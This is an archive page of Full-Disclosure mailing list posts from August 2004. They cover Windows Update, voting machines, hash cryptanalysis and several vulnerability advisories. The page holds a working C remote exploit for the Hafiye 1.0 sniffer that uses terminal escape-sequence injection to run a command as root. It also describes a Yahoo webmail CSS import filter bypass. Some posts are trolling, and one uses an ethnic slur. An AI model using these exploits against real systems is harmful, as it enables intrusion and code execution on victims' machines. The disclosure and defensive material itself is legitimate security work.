RE: !SPAM! RE: [Full-Disclosure] The 'good worm' from HP

2004-08-23 Thread Yaakov Yehudi



Yes it can. See the docs.


From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of The Central Scroutinizer
Sent: Monday, August 23, 2004 16:29
To: [EMAIL PROTECTED]
Subject: !SPAM! RE: [Full-Disclosure] The 'good worm' from HP

> It's called WindowsUpdate? That cannot be used locally/internally by an
> organization.

Aaron


[Full-Disclosure] Netfilter Conntrack

2004-08-23 Thread VeNoMouS



I know this is so not the right place to ask this, but most of
the people from netfilter-dev are total asshats and trying to get any sort of
info from them is a bitch.

Does anyone know of a decent way to delete an entry
from the conntrack (in C)? I've written an LKM to try to access
ip_conntrack_tuple and ip_conntrack to list and delete from
there but so far my attempts have been worthless.

so I'm asking you guys for [EMAIL PROTECTED]@!!!

chur VeNoMouS



[Full-Disclosure] found suspicious desktop.ini in startup folders

2004-08-23 Thread BillyBobKnob
Does anyone know if this file is used in an exploit since it was found in
startup folders ?

The contents of the file are:

[.ShellClassInfo]
[EMAIL PROTECTED],-21787



BillyBob




Re: [Full-Disclosure] Re-write with security in mind all ops.

2004-08-23 Thread Valdis . Kletnieks
On Mon, 23 Aug 2004 14:22:42 PDT, "Gregory A. Gilliss" said:

> People, believe it or not, before there was Dubya, before there were mad
> rag heads disgracing one of the world's most civilized religions, before 
> Sir Tim Berners-Lee  'invented' the Web, there was a network of people
> who shared information pretty freely and who, occasionally, would shell
> out of an app and gain root somewhere. All in all, it wasn't bad at all.

Yes.. I was around in that day and age.  However, I'll also note that by and
large, the people who would occasionally shell out weren't the sort of people
who were actively trying to blow me up.

Also, calling them "mad rag heads" is a bad idea - considered as a purely
military matter, they managed to pull off an operation that caused 3,000+
casualties on our side and only 19 on theirs.  Militarily, we got our butts
kicked.  And 3 years later, after invading 2 countries, we still don't even
know where their leader is. They're tech-savvy, using crypto to good effect,
and ditched their use of cell phones when they learned we knew how to track
them.  Consider that a very large chunk of our info was only obtained when
we accidentally busted our own mole in the organization - what does that
tell you about relative skill levels?

ObSecurity:  Demeaning the enemy with labels may be good training for Marines,
where dehumanizing the enemy to make it easier to kill them in combat may be a
good idea. It's a bad idea when trying to out-guess a clever opponent's next
move, when you know beforehand they're at least as clever as you.

> Now we have "no unencrypted links" which is a nice way of saying "I bet
> I can keep you off my swings". Funny how someone with a citigroup.com
> email is making such bold security claims. Two words - Vladimir Levin.

On the other hand, note that Citigroup is a bank and financial services
organization.

Would *YOU* trust a bank that *didn't* say "I bet I can keep you off my
swings/vaults/account info"?  Would you trust a bank that didn't do all
reasonable steps to secure themselves (and in this day and age, there's little
to no excuse for an unencrypted link for critical data)?

Personally, if I found my bank *wasn't* making such "bold security claims",
I'd find a new bank quickly.

> In case you haven't figured it out yet from the caustic replies you've
> received, around here the only credibility is clue. Abbreviations and 
> boasting count for diddly.

One of the more ironic things I've seen on this list to date.




Re: [Full-Disclosure] Re-write with security in mind all ops.

2004-08-23 Thread David Vincent
Gregory A. Gilliss wrote:
> ...before there were mad rag heads disgracing one of the world's most civilized
> religions...
...before there was you, being an ass...
grow up!  the rag-head thing is so passé, it makes your argument fall 
apart, makes you look like an ass, and makes any chance of me taking you 
seriously go out the window.

-d
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Fwd: Re: FullDisclosure: Security aspects of time synchronization infrastructure

2004-08-23 Thread Valdis . Kletnieks
On Sun, 22 Aug 2004 12:33:50 CDT, Robert Brown said:

> Also, what about a GPS time receiver on a moving vehicle, such as a
> ship at sea?  They would not necessarily know that the location
> information was wrong, unles they also had other means of determining
> location.  Besides, it might only be *SLIGHTLY* wrong, but wrong
> enough to cause the time signal to be off enough to cause the
> application to produce erroneous results.  It all depends on the
> application. 

An acquaintance of mine had a very early GPS unit (back in the days when not all
the satellites were up there yet, and the intentional fuzzing for civilian
units was in place).  He was driving through San Francisco, and the unit was
offering direction to his destination.  The box was experiencing occasional
temporary delusions of what street he's on, and gives him directions from a
side street next to US101 back onto US101 proper (which in fact he was already
on).  Then he heads across the bridge to Oakland, and on the way it has another
delusion...

And decides it's on Alcatraz Island, and promptly crashes because it can't find
a way to get from here to there.

Moral - sometimes "slightly wrong" is quite enough to cause a total failure...




Re: [Full-Disclosure] The 'good worm' from HP

2004-08-23 Thread Valdis . Kletnieks
On Mon, 23 Aug 2004 01:34:32 BST, The Central Scroutinizer said:
> Would it not be better to have a standard secure backdoor provided by a 
> security package that could be downloaded or installed by disk and works hand 
> in hand with port scanning software, if this is really necessary. I am

No, it would not be a good idea.

> surprised Microsoft have not released such a piece of software; maybe a 
> third party have.

Many third parties have done so, going all the way back to BackOrifice.

Think it through - there's 2 basic possibilities:

1) The machine is a Windows machine that's centrally administered and
controlled via Active Directory or similar system, as in many corporate
environments. In the AD world, it's well understood how to push fixes via Group
Policy, and other central-management schemes already have their own schemes for
doing it (even if it's a 'for i in `cat boxes.to.update`; do ssh $i...').
So in these environments, you don't need a backdoor.

2) The box isn't a member of an Active Directory or other similar
distributed-management scheme.  In this case, you don't want a back
door, because you have no sane way to validate who's doing the push of
software.  So you can't securely use a backdoor.





RE: [Full-Disclosure] Windows Update

2004-08-23 Thread Todd Towles
You are correct, I looked into this deeper this morning and found the same
results. It doesn't matter if it is running or not. It can be running
and set to manual, WindowsUpdate will still fail.

Therefore you have to set the service to automatic for WindowsUpdate to
work. It is Microsoft's attempt to force all users to have automatic
updates on by default. This is fine for your everyday normal at-home
user but it is a pain for corporations. People that use SUS need it
anyways, so it isn't a big deal. But we use SMS and I had the service
off to save resources. It was a service that was never going to work
correctly anyways (due to corporate proxy). Therefore to make a company
turn on an unneeded service after telling everyone to turn off all
unneeded services for security is pretty lame.

Once again, I see a need to have a separate OS base for corporations and
home customers. But I am glad to see the death of the Win9x kernel.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michael
Schaefer
Sent: Monday, August 23, 2004 2:17 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Windows Update

It looks like windows update requires Automated Updates to be set to
automatic startup, but does not require the process to actually be
running...

So the statement that they are "required" is obviously false.

As a work around, I can manually change the startup status, do the
windows update, then change the startup status back to manual.


Seriously annoying, but doable.






Re: [Full-Disclosure] Re-write with security in mind all ops.

2004-08-23 Thread Gregory A. Gilliss
As someone who's been around for a few years, replies like this cause me
to sit up and ask "who let you on?"

People, believe it or not, before there was Dubya, before there were mad
rag heads disgracing one of the world's most civilized religions, before 
Sir Tim Berners-Lee  'invented' the Web, there was a network of people
who shared information pretty freely and who, occasionally, would shell
out of an app and gain root somewhere. All in all, it wasn't bad at all.

Now we have "no unencrypted links" which is a nice way of saying "I bet
I can keep you off my swings". Funny how someone with a citigroup.com
email is making such bold security claims. Two words - Vladimir Levin.

In case you haven't figured it out yet from the caustic replies you've
received, around here the only credibility is clue. Abbreviations and 
boasting count for diddly.

G

On or about 2004.08.23 13:10:12 +, Clairmont, Jan M ([EMAIL PROTECTED]) said:

> Having worked on NATO security specs and other highly secured
> networks.  It wouldn't be that hard, just no unencrypted traffic
> and no unencrypted interprocess communication. Spammers and bozos would have to work 
> a lot harder for their fun.  
> 
> You can laugh all you want happy boy, but that is what is coming
> next. Get used to it.

-- 
Gregory A. Gilliss, CISSP  E-mail: [EMAIL PROTECTED]
Computer Security WWW: http://www.gilliss.com/greg/
PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3



RE: [Full-Disclosure] Re: Re-write with security in mind all ops.

2004-08-23 Thread Todd Towles
It is a never ending battle. Crackers and hash/encryption algorithms,
stealth and radar, viruses and anti-virus.

The war must be continued. If encryption was built into the underlying
subsystem of modern operating systems (without a huge hit on
performance), then the security of systems world wide would increase.
Strong encryption on interprocess communication would be a good start
(yet the service passwords are still in the registry ;)

Will this stop the cracker that will sit on your WEP for a year to
access your one wireless pc at the house. No. But it is another loop to
make them step thru, and none of us like loops. =) 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Feher Tamas
Sent: Monday, August 23, 2004 1:42 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: Re-write with security in mind all ops.

>It wouldn't be that hard, just no unencrypted traffic and no 
>unencrypted interprocess communication.
>Spammers and bozos would have to work a lot harder

Except that important crypto was broken... nothing is safe:

http://www.computerworld.com/printthis/2004/0,4814,95343,00.html

"Opinion: Cryptanalysis of MD5 and SHA: Time for a new standard by Bruce
Schneier, Counterpane, 19 Aug 2004

Crypto researchers report weaknesses in common hash functions

At the Crypto 2004 conference in Santa Barbara, Calif., this week,
researchers announced several weaknesses in common hash functions.
These results, while mathematically significant, aren't cause for alarm.
But even so, it's probably time for the cryptography community to get
together and create a new hash standard.

One-way hash functions are a cryptographic construct used in many
applications. They are used with public-key algorithms for both
encryption and digital signatures. They are used in integrity checking.
They are used in authentication. They have all sorts of applications in
a great many different protocols. Much more than encryption algorithms,
one-way hash functions are the workhorses of modern cryptography.

In 1990, Ron Rivest invented the hash function MD4. In 1992, he improved
on MD4 and developed another hash function: MD5. In 1993, the National
Security Agency published a hash function very similar to MD5, called
the Secure Hash Algorithm (SHA). Then in 1995, citing a newly discovered
weakness that it refused to elaborate on, the NSA made a change to SHA.
The new algorithm was called SHA-1. Today, the most popular hash
function is SHA-1, with MD5 still being used in older applications.

One-way hash functions are supposed to have two properties. One, they're
one-way. This means that it's easy to take a message and compute the
hash value, but it's impossible to take a hash value and re-create the
original message. (By "impossible," I mean "can't be done in any
reasonable amount of time.") Two, they're collision-free. This means
that it's impossible to find two messages that hash to the same hash
value. The cryptographic reasoning behind these two properties is
subtle, and I invite curious readers to learn more in my book Applied
Cryptography.

Breaking a hash function means showing that either -- or both -- of
those properties aren't true. Cryptanalysis of the MD4 family of hash
functions has proceeded in fits and starts over the past decade or so,
with results against simplified versions of the algorithms and partial
results against the whole algorithms.

This year, Eli Biham and Rafi Chen, and separately Antoine Joux,
announced some pretty impressive cryptographic results against MD5 and
SHA. Collisions have been demonstrated in SHA. And there are rumors,
unconfirmed at this writing, of results against SHA-1.

The magnitude of these results depends on who you are. If you're a
cryptographer, this is a huge deal. While not revolutionary, these
results are substantial advances in the field. The techniques described
by the researchers are likely to have other applications, and we'll be
better able to design secure systems as a result. This is how the
science of cryptography advances: We learn how to design new algorithms
by breaking other algorithms. In addition, algorithms from the NSA are
considered a sort of alien technology: They come from a superior race
with no explanations. Any successful cryptanalysis against an NSA
algorithm is an interesting data point in the eternal question of how
good they really are in there.

As a user of cryptographic systems -- as I assume most readers are --
this news is important, but not particularly worrisome. MD5 and SHA
aren't suddenly insecure. No one is going to be breaking digital
signatures or reading encrypted messages anytime soon with these
techniques. The electronic world is no less secure after these
announcements than it was before.

But there's an old saying inside the NSA: "Attacks always get better;
they never get worse." These techniques will continue to improve, and
probably someday there will be practical attacks based on these
techniques

[Full-Disclosure] Windows update - XPSP2

2004-08-23 Thread Gregh
For all of you who think you HAVE to turn auto update on, you do NOT have to 
do that!

You can go to:
http://www.microsoft.com/downloads/details.aspx?FamilyID=049c9dbe-3b8e-4f30-8245-9e368d3cdb5a&DisplayLang=en
and then click on the Download button to the right to download it. Once 
downloaded, you can double click on it to install it.

I don't like having auto update on - never HAVE liked it. So, I downloaded 
it that way and installed it.

I hope this finally resolves this issue!
Greg. 



Re: [Full-Disclosure] Windows Update

2004-08-23 Thread Barry Fitzgerald
Michael Schaefer wrote:
It looks like windows update requires Automated Updates to be set to 
automatic startup, but does not require the process to actually be 
running...

So the statement that they are "required" is obviously false.
As a work around, I can manually change the startup status, do the 
windows update, then change the startup status back to manual.

Seriously annoying, but doable.

It's a little bit more than seriously annoying, though.  It represents a 
very poor design choice.

Obviously, if this setting change works, it means that the automatic 
update client is not actually necessary to install patches from 
windowsupdate.  I could see the service requirement *if* Microsoft were 
piggybacking the installation code off of the client in an effort to no 
longer rely on installing the code with an ActiveX control, however what 
this demonstrates is that the only reason to do this check is strictly 
to ensure that automatic updates is running.

This is either a bug or a very poor design choice. 

If the idea is to ensure that everyone has automatic update running, 
then it's going to fail.  The people who are getting their updates from 
WindowsUpdate are not the people you generally need to worry about 
getting their patches -- it's the people who don't know about 
WindowsUpdate and who don't have automatic update running that you have 
to worry about.

What I'm saying is that warning people is good; blocking people is bad.
It's kind of like not letting someone get a medical checkup if they 
don't check their blood sugar everyday.  It hurts people more than it helps.

-Barry




Re: Re: [Full-Disclosure] Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept

2004-08-23 Thread da m0nk3y
On Fri, 20 Aug 2004 23:56:42 -0400, Chris Kelly <[EMAIL PROTECTED]> wrote:
> > #!/usr/bin/php
> >   Gallery 1.4.4 save_photos.php PHP Insertion Proof of Concept
> >   By aCiDBiTS  [EMAIL PROTECTED]  17-August-2004
> > ++  Vulnerability description  ++
> >
> >   Gallery (http://gallery.sf.net/) is a PHP image gallery script. Having
> > permission to upload photos in some album and the temporal directory is in
> > the webtree, then it is possible to create a file with any extension and
> > content. Tested in v 1.4.4, maybe older versions also vulnerable.
> >
> >   When uploading photos with the "URL method", they are saved in the temporal
> > directory before processing them. Any file with any content is accepted.
> > After downloading, the file is processed (discarded if it is not an image)
> > and deleted from the temporal directory.
> >
> >   When the script downloads the file to the temporal directory there's the
> > function set_time_limit() that by default waits 30 seconds to abort the
> > process if no more data is received and the transfer connection isn't
> > closed. If the temporal directory is in the webtree, during this 30 seconds
> > timeout we can access to the file, executing it.
> >
> >   There's also a "directory disclosure" that I've used to determine if the
> > temporal directory is in gallery's webtree.  It consists in sending a longer
> > filename than permitted by the filesystem for the image upload name.
> 
> We are disappointed that you made no effort to get in touch with us
> about this issue before announcing it on full-disclosure, which
> prevented us from having a fix ready at the same time.  

raped

> A fix has been
> made and both an update patch (1.4.4-sr1) and full release (1.4.4-pl1,
> which also fixes some other minor non-security related bugs) are
> available for download as of 11:00pm EST August 20th 2004.
>
> download information:
> http://sourceforge.net/project/showfiles.php?group_id=7130
> 
> release information:
> http://gallery.sourceforge.net/article.php?sid=134
> 
> -Chris Kelly
> Gallery Project Manager
> 
> 
> 
AcIdBiTS owned Gallery.sourceforge.net



[Full-Disclosure] Using CHKROOTKIT

2004-08-23 Thread da m0nk3y
Like most of you know, using chkrootkit can help you by detecting very
malicious hackers from keeping access to your hacked servers.

What will be explained in this special release paper is HOW it does
such a great job and why you should use it too just in case you're the
kind of person who does not have an up to date list of good security
software.

More about chkrootkit...

CHKROOTKIT is a software whose name is recognized as
the state of the art in rootkit detection.

Written in bash, CHKROOTKIT is skilled in the calling of other programs
written in C that can perform over complicated procedures that are
very good for that kind of work. Chkrootkit benefits from high level
programs to gather very specific information about a system.

Take it from a real hacker: using chkrootkit on a daily basis preserves
your reputation and integrity and is stress relieving. I *strongly*
recommend it.

As a hacker I can tell you that CHKROOTKIT made my work harder to a point
where I decided to change my profession to security professional.

Please send me all sorts of information to my gmail email.

But bee Nice.
  da m0nk3y, k1ng 0f b44n4n4 1sl4ndz



Re: [Full-Disclosure] Electronic Voting Machines - WinVote by Adv anced Voting Solutions

2004-08-23 Thread da m0nk3y
Dewd,

On Sat, 21 Aug 2004 11:11:21 -0700, David L. Dill
<[EMAIL PROTECTED]> wrote:
> 
> So far as I know, no one denies that denial of service attacks against
> wireless are basically unstoppable.  However, wireless interfaces in
> touch-screen machines are not intended for use during actual voting.
> They are for downloading ballots before the election, and, sometimes,
> uploading results after the election.

Yes plus me adds the sentence 'This is a good security tekneeq.'.

> The primary concerns about wireless are computer security concerns.
> I am personally VERY concerned.  It's very hard to make sure that
> wireless connections are turned off during the election, and wireless
> opens lots of security threats that wouldn't be serious otherwise.
> 

First in thing important I will introduce you to will follow in the
next sentence. It is possible depending on the network device used to
determine if it is active or not or if it is and is disabled or not.

Second thing to say, Murphy is a whitehat.

We believe electronic voting is the future voting system; do not think
too much about security or you will lose track of your ideas.
Instead make it simple wireless. Mistakes will happen. You know you
are right even if you thought about this. Overall these are good
reflections.

> 
> > Not long ago I sent out a mail regarding electronic voting, it was
> > related to a politically motivated thread though so many likely filtered
> > it. I suggest anyone interested take a tour of the verified voting
> > website. They have fairly in depth coverage and information you may find
> > useful. I also suggest you take the time to get involved and have an impact.
> >
> > http://www.verifiedvoting.org/
> >
> > It is a US based site and debate however there is plenty of information
> > on worldwide usage of paperless voting systems for others that may be
> > interested.
> >
> >
> > Mister Coffee wrote:
> > > Actually, no it's not illegal, and no, it's not especially dangerous.
> > > While FCC regs require Ham operators to use the "lowest practical
> > > power" in their communications, that is something that's open to
> > > interpretation.  Hams on some freqs crank out 1500 watts quite
> > > readily - and safely.  We're not talking about a WiFi card in your
> > > laptop, or a cell phone next to your head - there are safety
> > > considerations and limits of exposure and such.  But your statement
> > > that it's illegal and dangerous is patently untrue for the amateur
> > > radio crowd.
> > >
> > > Hams are, incidentally, the Primary Users for the lower 6 channels (US
> > > spec) used by WiFi.
> > >
> > > Cheers, L4J
> > >
> > >
> > > On Fri, Aug 20, 2004 at 09:50:43AM -0300, James Tucker wrote:
> > >
> > >> Of course the power ranges you quote are also illegal, not to
> > >> mention extremely dangerous.
> > >>
> > >> On Thu, 19 Aug 2004 10:21:49 -0500, Michael Williamson
> > >> <[EMAIL PROTECTED]> wrote:
> > >>
> > >>> Using 802.11 for anything remotely critical is outright STUPID.
> > >>>
> > >>> FCC regulations are such that these part 15 devices (802.11,
> > >>> cordless phones, baby monitors) have no legal protection from
> > >>> interference from licensed services (amateur radio, TV stations,
> > >>> etc).  If I'm running a high powered (10-100 watt) maybe signal
> > >>> at 2.4 ghz for amateur radio TV and happen to be living across
> > >>> the street from an election center, they're basically screwed.
> > >>> As a matter of fact, if their 802.11 is interfering with my
> > >>> licensed operation, it is they who must shut down.
> > >>>
> > >>> -Michael
> > >>>
> > >>>
> > >>>
> > >>>
> > >>>
> >  Without even commenting on the "security" of WEP, it seems to
> >  me that a massive DDOS attack against the voting machines could
> >  prevent vote tallies from being counted in a timely manner.
> > >>>
> >
> 
pwnd



[Full-Disclosure] Yahoo! E-mail Service Vulnerability

2004-08-23 Thread Dror Shalev

Yahoo! E-mail Service Vulnerability

Release Date: August 23, 2004

Severity: Critical (Potential web-based e-mail worm)

Systems Affected:
Other web-based e-mail systems may be vulnerable.
Internet Explorer and any software application used for reading Yahoo
e-mail messages. (The ActiveX payload is relevant only for Internet Explorer.)

Finjan Software notification sent to Yahoo! on May 24, 2004.

Status:
Yahoo! has already patched their Web-based e-mail services on July 16, 2004.
Other web-based e-mail systems may be vulnerable.

Description:
Finjan Software identified a new critical cross site scripting vulnerability
in Yahoo's Web-based e-mail service. This vulnerability allowed hackers to
develop an attack that could have caused significant computer damage during
regular Internet use.

This vulnerability resulted from the failure of Yahoo's active content filter
to adequately block ActiveX controls and other active content components, and
affected all Windows based system platforms that read e-mail messages using
Yahoo Web-mail service. ActiveX controls are downloadable programs that run
with the same rights and privileges as the user, allowing access to files and
personal information stored on a local hard drive or shared folder. A no-click
attack could have launched automatically once a user opened an e-mail message.

For example, the vulnerability could have also potentially allowed a worm to
read the Windows address book, replicate and send itself to everyone in the
address book, and have this process repeat at an exponential rate. It could
have also harvested email addresses from local files, just like any other
worm, and used the Yahoo web-mail vulnerability to send the email messages.
Other web-based e-mail systems may be vulnerable to this vulnerability.

Technical details:
The potential worm could do anything that the user could do.
It is a potentially automatic attack. Users had to simply read the infected
email message.
This was a cross-site scripting vulnerability of the Yahoo! Web-based e-mail
service. There are two variants of this vulnerability.
The purpose of Yahoo's active content filter is to block the injection of any
active content into Yahoo! messages. However, the basic failure that allowed
this vulnerability is that there was no blocking of a backslash that is used
instead of the import rule.

An example:

<[EMAIL PROTECTED]
"http://www.finjan.com/mcrc/file.css";-->

The injected JavaScript code inside the CSS file is responsible for:
- Getting cookies.
- Automatic launching of malicious code.
- A possible identity theft using a spoofed re-login window.
- Sending an e-mail message.

The injected ActiveX control can be used for a destructive payload of the
propagating worm. The basic attack does not require an ActiveX control. The
ActiveX control is the payload that can be used to extend the attack to
non-web mail users, or to perform any malicious activity, including
formatting of the hard disk. Upon using the ActiveX control, the end user may
get a security warning. It depends on the security setting of the browser.

An example:
http://www.finjan.com/SecurityLab/SecurityTestingCenter/activex.asp
(Click on the 'test me' button after reading the disclaimer.)

Credit:
Bitlance Winter provided the initial tip.
Finjan Software's Malicious Code Research Center (MCRC) has expanded it.

Protection:
This specific vulnerability has been eliminated by Yahoo based on Finjan
Software notification.
Finjan's content security products provided proactive defense against this
Yahoo! vulnerability prior to its detection and correction.
Finjan's patented behavior blocking engine will protect computer users from
similar future vulnerabilities and comparable potential exploits.

Credit: Bitlance Winter, Dror Shalev and Menashe Eliezer.

Finjan Software
Malicious Code Research Center (MCRC) department
http://www.finjan.com/mcrc

Prevention is the best cure!

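The filter failure the advisory describes, worked through as an added example (not Finjan's or Yahoo's code). The page does not give the exact bypass string (the example above is garbled by the archive's address redaction), so the assumption here is the obvious one: the filter matched the literal text `@import`, and a CSS backslash escape such as `@\import` or `@\69mport`, which a browser decodes to the same rule, slipped past it. The hardened check decodes CSS escapes before matching; `css_unescape` is a minimal decoder written for this example, not a complete CSS tokenizer.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Decode CSS backslash escapes (CSS 2.1 section 4.1.3): "\" followed by one
 * to six hex digits (plus one optional whitespace terminator) denotes a code
 * point, "\" followed by a newline is a line continuation, and "\" followed
 * by any other character stands for that character. Code points above 0x7f
 * are replaced by '?', which is enough for keyword matching. */
size_t css_unescape(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    size_t i = 0;
    while (in[i] != '\0' && o + 1 < outsz) {
        if (in[i] != '\\') { out[o++] = in[i++]; continue; }
        i++;                                    /* consume the backslash */
        if (in[i] == '\0') break;               /* dangling backslash: drop */
        if (isxdigit((unsigned char)in[i])) {
            unsigned long cp = 0;
            int n = 0;
            while (n < 6 && isxdigit((unsigned char)in[i])) {
                char c = in[i++];
                cp = cp * 16 + (unsigned long)(isdigit((unsigned char)c)
                        ? c - '0' : tolower((unsigned char)c) - 'a' + 10);
                n++;
            }
            if (in[i] == ' ' || in[i] == '\t' || in[i] == '\n' ||
                in[i] == '\r' || in[i] == '\f')
                i++;                            /* optional terminator */
            out[o++] = cp < 0x80 ? (char)cp : '?';
        } else if (in[i] == '\n') {
            i++;                                /* escaped newline: continuation */
        } else {
            out[o++] = in[i++];                 /* "\i" is just "i" */
        }
    }
    if (outsz) out[o] = '\0';
    return o;
}

/* Case-insensitive ASCII substring test. */
static int ci_contains(const char *hay, const char *needle)
{
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t k = 0;
        while (k < n && hay[k] &&
               tolower((unsigned char)hay[k]) == tolower((unsigned char)needle[k]))
            k++;
        if (k == n) return 1;
    }
    return 0;
}

/* Filter of the kind the advisory describes: matches the literal text
 * "@import" in the raw stylesheet, so "@\import" and "@\69mport" get through
 * even though the browser decodes both to "@import". Returns 1 if blocked. */
int naive_filter_blocks(const char *css)
{
    return ci_contains(css, "@import");
}

/* Hardened version: normalise escapes first, then match the rule keyword. */
int hardened_filter_blocks(const char *css)
{
    char plain[1024];
    css_unescape(css, plain, sizeof plain);
    return ci_contains(plain, "@import");
}
```

Decoding before matching closes this particular hole, but a blocklist stays fragile against the next encoding trick (comments inside the keyword, alternative rules, `expression()` on IE); the durable fix is to parse the stylesheet and allow only known-safe properties and values.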



[Full-Disclosure] Hafiye-1.0 Terminal Escape Sequence Injection Vulnerability

2004-08-23 Thread Serkan Akpolat
+---[ Software ]--+
Hafiye [1.0] "POSIX-compliant, customizable TCP/IP packet sniffer."
+---[  Tested Versions ]--+
Hafiye[1.0]
Tested on:Linux(Hafiye compiled from tarball)
  FreeBSD 4.7 (Installed from CD)
+---[  Vulnerability   ]--+
Packet Payload Terminal Escape Sequence Injection Vulnerability.
Results: DoS/Remote Root Compromise
+---[  Description ]--+
Hafiye[1.0] is a POSIX-compliant, customizable TCP/IP packet sniffer.
It runs with uid 0 privilege.
Hafiye-1.0 doesn't filter the payload when printing it to the terminal.
A malicious attacker can send packets with escape sequence payloads
to exploit this vulnerability.
If Hafiye has been started with the -n packet count option,
the vulnerability could allow remote code execution.
For remote code execution the victim must press Enter after program exit.
+---[ Contact  ]--+
http://deicide.siyahsapka.org
[EMAIL PROTECTED]
+---[ Proof Of Concept Exploit ]--+
/* Remote Exploit for Hafiye-1.0
** Terminal Escape Sequence Injection Vulnerability
** Written by Serkan Akpolat
** Homepage: http://deicide.siyahsapka.org
** E-mail: [EMAIL PROTECTED]
** Greets: Virulent, gorny and all other netricians
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

typedef struct _target {
    char *host;
    u_short port;
    unsigned int sequence;  /* which entry of esc_sequence[] to send */
    unsigned int cnt;       /* how many times to send it */
} target;

/* Index 0 is a placeholder so that "-e 1".."-e 3" index directly. */
char *esc_sequence[] = {"Escape Sequences",
    /* 1: OSC 2 sets the terminal title bar text */
    "\x1b""]2;Insecure?""\x07\x0a",
    /* 2: ring the bell six times */
    "\x07\x07\x07\x07\x07\x07",
    /* 3: set the title to ";echo Owned > /root/Owned.txt", then CSI 21 t
     *    makes xterm report the title back as if it had been typed, the
     *    title is reset to "xterm", and "Abnormal Termination" plus SGR 8
     *    (concealed) hide the pending input until the victim presses Enter */
    "\x1b""]2;;echo Owned > /root/Owned.txt"
    "\x07\x1b""[21t""\x1b""]2;xterm""\x07"
    "Abnormal Termination""\x1b"
    "[8m;""\x0a"};

char use[] = "\t[ -h host ] [ -p port ] [ -e esc-seq-n ] [ -l number ]\n"
             "\t  Escape Sequences :\n"
             "\t1-Change TitleBar Text to \"Insecure?\"\n"
             "\t2-Ring The Bell\n"
             "\t3-Hidden Prompt to Create Owned.txt in /root\n"
             "\tExample: ./exp -h 192.168.0.3 -p 80 -e 1 -l 1\n";

void usage(void)
{
    printf("%s", use);
    exit(1);
}

/* Open a TCP connection to host:port; the payload only has to cross the
 * wire where the sniffer can see it, so any listening port will do. */
int connect_to_host(char *host, u_short port)
{
    int sock = 0;
    struct hostent *hp;
    struct sockaddr_in sa;

    memset(&sa, 0, sizeof(sa));
    hp = gethostbyname(host);
    if (hp == NULL) {
        herror("Error:");
        exit(1);
    }
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0)
        exit(1);
    if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
        exit(1);
    printf("[+] Connected to %s\n", host);
    return sock;
}

int main(int argc, char **argv)
{
    int i;
    int sock = 0;
    char buf[256] = "\0";
    target tgt;

    memset(&tgt, 0, sizeof(tgt));
    while ((i = getopt(argc, argv, "h:p:e:l:")) != -1) {
        switch (i) {
        case 'h':
            tgt.host = optarg;
            break;
        case 'p':
            tgt.port = (u_short) atoi(optarg);
            break;
        case 'e':
            tgt.sequence = atoi(optarg);
            if (tgt.sequence < 1 || tgt.sequence > 3)
                usage();
            break;
        case 'l':
            tgt.cnt = atoi(optarg);
            if (tgt.cnt < 1)
                tgt.cnt = 1;
            break;
        case ':':
        case '?':
        default:
            usage();
        }
    }
    if (optind != argc || !tgt.host || !tgt.port ||
        !tgt.sequence || !tgt.cnt)
        usage();

    sock = connect_to_host(tgt.host, tgt.port);
    strncpy(buf, esc_sequence[tgt.sequence], sizeof(buf) - 1);
    printf("[+] Sending Escape Sequences\n");
    do {
        /* send the raw bytes; the sniffer prints them to the terminal unfiltered */
        if (send(sock, buf, strlen(buf), 0) < 0) {
            printf("Socket Error\n");
            exit(1);
        }
        tgt.cnt--;
    } while (tgt.cnt > 0);
    close(sock);
    return 0;
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
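The mitigation the advisory points at (Hafiye prints captured bytes to the terminal unfiltered) is to escape control bytes before they reach the terminal. What follows is an added example written for this page, not code from Hafiye or from the posted exploit; the function names and the escaping policy are this example's own choices, and the sample packet in main() is constructed. It hex-escapes every C0 control byte except newline and tab, DEL, and the C1 range 0x80-0x9f, which an 8-bit-clean xterm treats as CSI/OSC introducers, so the title-set/title-report pair used by payload 3 above is rendered visibly instead of executed.

```c
/* Added example, not part of Hafiye or the posted exploit: escape packet
 * payload bytes before a sniffer writes them to a terminal.  Function
 * names and the escaping policy are this example's own assumptions. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Bytes a terminal may act on instead of displaying: C0 controls other
 * than newline and tab (ESC 0x1b and BEL 0x07 among them), DEL 0x7f, and
 * the C1 range 0x80-0x9f (0x9b is an 8-bit CSI, 0x9d an 8-bit OSC). */
static int is_terminal_control(unsigned char c)
{
    if (c == '\n' || c == '\t')
        return 0;
    return c < 0x20 || (c >= 0x7f && c <= 0x9f);
}

/* Copy n bytes of payload into out, rewriting each control byte as a
 * visible "\xNN".  out is always NUL-terminated when outsz > 0.  Copying
 * stops at the first element that would not fit, so the output never
 * ends in a half-written escape.  Returns the length the fully escaped
 * payload needs (without the NUL); a value >= outsz means truncation. */
size_t sanitize_payload(const unsigned char *in, size_t n,
                        char *out, size_t outsz)
{
    size_t needed = 0, pos = 0;
    int full = 0;

    for (size_t i = 0; i < n; i++) {
        char rep[5];
        size_t len;

        if (is_terminal_control(in[i])) {
            snprintf(rep, sizeof rep, "\\x%02x", (unsigned) in[i]);
            len = 4;
        } else {
            rep[0] = (char) in[i];
            len = 1;
        }
        needed += len;
        if (!full) {
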